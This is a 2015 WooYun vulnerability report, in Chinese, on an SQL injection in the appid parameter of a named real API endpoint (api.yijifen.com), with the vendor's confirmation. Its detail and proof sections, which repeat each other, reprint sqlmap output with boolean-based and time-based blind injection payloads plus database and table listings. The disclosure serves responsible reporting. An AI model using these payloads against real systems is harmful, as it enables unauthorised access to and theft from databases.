当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157059

漏洞标题:北京亿玛p2p业务某api接口sql

相关厂商:emar.com

漏洞作者: Aug0st

提交时间:2015-11-30 16:54

修复时间:2016-01-14 17:34

公开时间:2016-01-14 17:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经确认,细节仅向厂商公开
2015-12-10: 细节向核心白帽子及相关领域专家公开
2015-12-20: 细节向普通白帽子公开
2015-12-30: 细节向实习白帽子公开
2016-01-14: 细节向公众公开

简要描述:

rt

详细说明:

漏洞地址:http://api.yijifen.com/EScore_API/common/comfirmActivateCheckGet.do?appid=1056497222&deviceid=&IDFA=D900C5E4-7934-4161-BE20-7C97F66BFD41&actiontime=1448616690731
appid参数存在注入
400多个表只列举一部分,跑完太慢了
sqlmap identified the following injection point(s) with a total of 225 HTTP(s) requests:
---
Parameter: appid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: appid=1056497222' AND 1141=1141 AND 'nBXf'='nBXf&deviceid=&IDFA=D900C5E4-7934-4161-BE20-7C97F66BFD41&actiontime=1448616690731
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: appid=1056497222' AND (SELECT * FROM (SELECT(SLEEP(5)))VIcY) AND 'JzMV'='JzMV&deviceid=&IDFA=D900C5E4-7934-4161-BE20-7C97F66BFD41&actiontime=1448616690731
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
back-end DBMS: MySQL 5.0.12
available databases [8]:
[*] dbaadmin
[*] eqile
[*] escore
[*] information_schema
[*] luckcat
[*] mysql
[*] performance_schema
[*] test
back-end DBMS: MySQL 5.0.12
Database: escore
[449 tables]
+--------------------------------------------+
| activemq_acks |
| activemq_lock |
| activemq_msgs |
| app_during_limit_config |
| app_ip_limit_black_list |
| app_ip_limit_config |
| app_ip_limit_white_list |
| app_ip_period_limit_black_list |
| app_ip_period_limit_config |
| app_zanting_20151117 |
| b0420_t_campaign_confirm |
| b0420_t_finance_balance_campain |
| b0420_t_finance_balance_income_rel |
| b331_application_black |
| b_ad_dsp_custom_confirm0605 |
| b_static_user_adtype_byday08 |
| b_user4 |
| b_user5 |
| b_user6 |
| b_user7 |
| bb_black |
| d_area |
| d_haha |
| ios_action_log2014 |
| rroc_errorlog |
| scn_log |
| sheet1 |
| t_activate_signnum |
| t_ad |
| t_ad_actual_day |
| t_ad_audit_log |
| t_ad_backup_20150814 |
| t_ad_backup_20151127 |
| t_ad_category_rel |

漏洞证明:

漏洞地址:http://api.yijifen.com/EScore_API/common/comfirmActivateCheckGet.do?appid=1056497222&deviceid=&IDFA=D900C5E4-7934-4161-BE20-7C97F66BFD41&actiontime=1448616690731
appid参数存在注入
400多个表只列举一部分,跑完太慢了
sqlmap identified the following injection point(s) with a total of 225 HTTP(s) requests:
---
Parameter: appid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: appid=1056497222' AND 1141=1141 AND 'nBXf'='nBXf&deviceid=&IDFA=D900C5E4-7934-4161-BE20-7C97F66BFD41&actiontime=1448616690731
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: appid=1056497222' AND (SELECT * FROM (SELECT(SLEEP(5)))VIcY) AND 'JzMV'='JzMV&deviceid=&IDFA=D900C5E4-7934-4161-BE20-7C97F66BFD41&actiontime=1448616690731
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
back-end DBMS: MySQL 5.0.12
available databases [8]:
[*] dbaadmin
[*] eqile
[*] escore
[*] information_schema
[*] luckcat
[*] mysql
[*] performance_schema
[*] test
back-end DBMS: MySQL 5.0.12
Database: escore
[449 tables]
+--------------------------------------------+
| activemq_acks |
| activemq_lock |
| activemq_msgs |
| app_during_limit_config |
| app_ip_limit_black_list |
| app_ip_limit_config |
| app_ip_limit_white_list |
| app_ip_period_limit_black_list |
| app_ip_period_limit_config |
| app_zanting_20151117 |
| b0420_t_campaign_confirm |
| b0420_t_finance_balance_campain |
| b0420_t_finance_balance_income_rel |
| b331_application_black |
| b_ad_dsp_custom_confirm0605 |
| b_static_user_adtype_byday08 |
| b_user4 |
| b_user5 |
| b_user6 |
| b_user7 |
| bb_black |
| d_area |
| d_haha |
| ios_action_log2014 |
| rroc_errorlog |
| scn_log |
| sheet1 |
| t_activate_signnum |
| t_ad |
| t_ad_actual_day |
| t_ad_audit_log |
| t_ad_backup_20150814 |
| t_ad_backup_20151127 |
| t_ad_category_rel |

修复方案:

过滤

版权声明:转载请注明来源 Aug0st@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-30 17:34

厂商回复:

感谢提供信息,我们紧急修复。

最新状态:

暂无